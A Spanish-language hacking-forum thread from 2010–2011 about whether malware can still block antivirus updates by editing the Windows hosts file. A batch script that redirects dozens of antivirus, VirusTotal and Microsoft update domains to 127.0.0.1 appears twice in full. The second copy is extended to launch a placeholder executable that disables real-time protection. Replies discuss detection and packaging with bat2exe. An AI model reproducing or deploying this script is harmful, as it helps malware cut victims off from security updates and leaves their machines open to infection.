elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Bloquear actualizaciones de antivirus ¿aun funciona esto?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Bloquear actualizaciones de antivirus ¿aun funciona esto?  (Leído 6,448 veces)
usuario oculto


Desconectado Desconectado

Mensajes: 450



Ver Perfil WWW
Bloquear actualizaciones de antivirus ¿aun funciona esto?
« en: 26 Diciembre 2010, 16:22 pm »

  

 no lo digo porque el code este detectado, me refiero a su utilidad, creo que continuamente van cambiando los servidores con los que actualizan, sabeis los nombres de algunos?
Código:
@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
« Última modificación: 26 Diciembre 2010, 16:49 pm por mansan[a] » En línea

Que le jodan a  la salud mental!
Fecha de registro:    16 Noviembre 2008, 17:38
años atrás users baneados :)
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Bloquear actualizaciones de antivirus ¿aun funciona esto?
« Respuesta #1 en: 26 Diciembre 2010, 21:10 pm »

Debe funcionar, pero hasta el antivirus mas patetico es capaz de darse cuenta que algo malo ocurre cuando se modificar el fichero hosts :xD
En línea

sabeeee

Desconectado Desconectado

Mensajes: 155


Ver Perfil
Re: Bloquear actualizaciones de antivirus ¿aun funciona esto?
« Respuesta #2 en: 29 Enero 2011, 01:01 am »

Esto ya no funciona mas o eso creo.
¿Que es lo que pasa?, los avs se actualizan creo, desde el reg con otro ip asi que creo que esto aunque lo camuflemos con el mejor cripter creo que levantaría sospechas pero porque empresaria a mandar alertas pero es posible ej: con el execript, al otro día mandan a mi virus, lo analizar, después como mi virus desactivo a las actualizaciones de x cantidad de antivirus esa x cantidad de ordenadores con antivirus des-actualizados seguirá infectándose Xd.
« Última modificación: 29 Enero 2011, 02:43 am por boludoz » En línea

"Vengándose, uno iguala a su enemigo; perdonando, uno se muestra superior a él."
Francis Bacon
xarlyuno

Desconectado Desconectado

Mensajes: 40


Ver Perfil
Re: Bloquear actualizaciones de antivirus ¿aun funciona esto?
« Respuesta #3 en: 30 Enero 2011, 16:43 pm »

hace poco me topé con el kido.ih ese no te deja ni actualizar ni descargar antivirus pork bloquea el host; pero como lo vi en una pc sin antivirus no se como se comporta con un antivirus, lo claro es que por ejemplo kaspersky lo detecta pk ellos sacaron la cura...
En línea

Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: Bloquear actualizaciones de antivirus ¿aun funciona esto?
« Respuesta #4 en: 31 Enero 2011, 20:23 pm »

Cualquier AV de pago o con fama detecta eso. No valen los caseros ;)
Sencillamente se le pone que mire si alguien modifica hosts y listo... Creo que hasta yo sabría hacerlo, y eso es mucho jeje
Ademas si el puerto esta cerrado significa que algo malo pasa en casita. Sencillamente te detectarian como virus y lo arreglarian...
En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
usuario oculto


Desconectado Desconectado

Mensajes: 450



Ver Perfil WWW
Re: Bloquear actualizaciones de antivirus ¿aun funciona esto?
« Respuesta #5 en: 1 Febrero 2011, 21:17 pm »

Cualquier AV de pago o con fama detecta eso. No valen los caseros ;)
Sencillamente se le pone que mire si alguien modifica hosts y listo... Creo que hasta yo sabría hacerlo, y eso es mucho jeje
Ademas si el puerto esta cerrado significa que algo malo pasa en casita. Sencillamente te detectarian como virus y lo arreglarian...

 Pero todos detectan la acción ¿o el código?, habría que testearlos.Porque si solo fuese código se podría hacer.Hay otros malware que si pueden.
« Última modificación: 1 Febrero 2011, 21:22 pm por mansan[a] » En línea

Que le jodan a  la salud mental!
Fecha de registro:    16 Noviembre 2008, 17:38
años atrás users baneados :)
sabeeee

Desconectado Desconectado

Mensajes: 155


Ver Perfil
Re: Bloquear actualizaciones de antivirus ¿aun funciona esto?
« Respuesta #6 en: 3 Febrero 2011, 21:38 pm »

Aki va un código de doble filo.
Código:
@echo off
set hosts=%windir%\System32\drivers\etc\hosts
echo. >> %hosts%
echo 127.0.0.1 avp.com >> %hosts%
echo 127.0.0.1 ca.com >> %hosts%
echo 127.0.0.1 customer.symantec.com >> %hosts%
echo 127.0.0.1 dispatch.mcafee.com >> %hosts%
echo 127.0.0.1 download.mcafee.com >> %hosts%
echo 127.0.0.1 f-secure.com >> %hosts%
echo 127.0.0.1 kaspersky.com >> %hosts%
echo 127.0.0.1 kaspersky-labs.com >> %hosts%
echo 127.0.0.1 liveupdate.symantec.com >> %hosts%
echo 127.0.0.1 liveupdate.symantecliveupdate.com >> %hosts%
echo 127.0.0.1 mast.mcafee.com >> %hosts%
echo 127.0.0.1 mcafee.com >> %hosts%
echo 127.0.0.1 microsoft.com >> %hosts%
echo 127.0.0.1 my-etrust.com >> %hosts%
echo 127.0.0.1 nai.com >> %hosts%
echo 127.0.0.1 networkassociates.com >> %hosts%
echo 127.0.0.1 pandasoftware.com >> %hosts%
echo 127.0.0.1 rads.mcafee.com >> %hosts%
echo 127.0.0.1 secure.nai.com >> %hosts%
echo 127.0.0.1 securityresponse.symantec.com >> %hosts%
echo 127.0.0.1 sophos.com >> %hosts%
echo 127.0.0.1 symantec.com >> %hosts%
echo 127.0.0.1 trendmicro.com >> %hosts%
echo 127.0.0.1 updates.symantec.com >> %hosts%
echo 127.0.0.1 update.symantec.com >> %hosts%
echo 127.0.0.1 us.mcafee.com >> %hosts%
echo 127.0.0.1 viruslist.com >> %hosts%
echo 127.0.0.1 virustotal.com >> %hosts%
echo 127.0.0.1 www.avp.com >> %hosts%
echo 127.0.0.1 www.f-secure.com >> %hosts%
echo 127.0.0.1 www.grisoft.com >> %hosts%
echo 127.0.0.1 www.kaspersky.com >> %hosts%
echo 127.0.0.1 www.mcafee.com >> %hosts%
echo 127.0.0.1 www.microsoft.com >> %hosts%
echo 127.0.0.1 www.moneybookers.com >> %hosts%
echo 127.0.0.1 www.my-etrust.com >> %hosts%
echo 127.0.0.1 www.nai.com >> %hosts%
echo 127.0.0.1 www.networkassociates.com >> %hosts%
echo 127.0.0.1 www.pandasoftware.com >> %hosts%
echo 127.0.0.1 www.sophos.com >> %hosts%
echo 127.0.0.1 www.symantec.com >> %hosts%
echo 127.0.0.1 www.trendmicro.com >> %hosts%
echo 127.0.0.1 www.virustotal.com >> %hosts%
strart el_nombre_del_virus_que_gasta_memoria_y_desabilita_los_avs_en_tiempo_real.exe
strart el_nombre_del_virus_que_gasta_memoria_y_desabilita_los_avs_en_tiempo_real.exe
Lo compilamos con el_nombre_del_virus_que_gasta_memoria_y_desabilita_los_avs_en_tiempo_real.exe y para que no se vea la ventana y tendremos un virus en tiempo real con triple funcion XD.
« Última modificación: 3 Febrero 2011, 22:05 pm por Karcrack » En línea

"Vengándose, uno iguala a su enemigo; perdonando, uno se muestra superior a él."
Francis Bacon
Karcrack


Desconectado Desconectado

Mensajes: 2.416


Se siente observado ¬¬'


Ver Perfil
Re: Bloquear actualizaciones de antivirus ¿aun funciona esto?
« Respuesta #7 en: 3 Febrero 2011, 22:03 pm »


Si guardas como .exe lo unico que conseguiras es que no funcione nada ;) Mejor elige .bat :D

PD: Para codigos relativamente largos utiliza las etiquetas [code][/code] en vez de [quote][/quote] y mas si no coloreas...
« Última modificación: 3 Febrero 2011, 22:06 pm por Karcrack » En línea

Garfield07


Desconectado Desconectado

Mensajes: 1.121


¡Este año voy a por todas! JMJ 2011


Ver Perfil WWW
Re: Bloquear actualizaciones de antivirus ¿aun funciona esto?
« Respuesta #8 en: 3 Febrero 2011, 22:47 pm »

Karcrack, no vale la pena :P Un bat? Como no uses un bat2exe o algo asi...
Boludoz, apende programación en lenguajes compilados, que eso se detecta...
En línea



* Quiero cambiar el mundo, pero estoy seguro de que no me darían el código fuente.
* No estoy tratando de destruir a Microsoft. Ese será tan solo un efecto colateral no intencionado.
* Si compila esta bien, si arranca es perfecto.

¡Wiki elhacker.net!
Un saludo
YST


Desconectado Desconectado

Mensajes: 965


I'm you


Ver Perfil WWW
Re: Bloquear actualizaciones de antivirus ¿aun funciona esto?
« Respuesta #9 en: 4 Febrero 2011, 10:23 am »

Eso ya dejo de funcionar hace años solo logras bloquear los www.virustotal.com y esas cosas .

Aparte si intentas desactivar el kapersky a si .... lo unico que conseguiras son las risas de los programadores  :xD


En línea



Yo le enseñe a Kayser a usar objetos en ASM
Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Como puedo bloquear esto en flash MX 2004
Diseño Gráfico
Ozz 5 1,954 Último mensaje 14 Octubre 2004, 09:20 am
por Azielito
como funciona un antivirus
Seguridad
Naslednik 3 2,957 Último mensaje 26 Abril 2011, 20:42 pm
por dimitrix
Las soluciones antivirus aún tienen problemas cuando se trata de bloquear ....
Noticias
wolfbcn 0 1,633 Último mensaje 23 Diciembre 2012, 02:40 am
por wolfbcn
¿Pueden capar o bloquear el P2P los operadores? Pronto esto y más
Noticias
wolfbcn 3 965 Último mensaje 27 Octubre 2015, 22:56 pm
por engel lex
Este troyano cambia tus DNS y bloquea las actualizaciones del antivirus
Noticias
wolfbcn 1 464 Último mensaje 18 Julio 2019, 00:16 am
por @XSStringManolo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines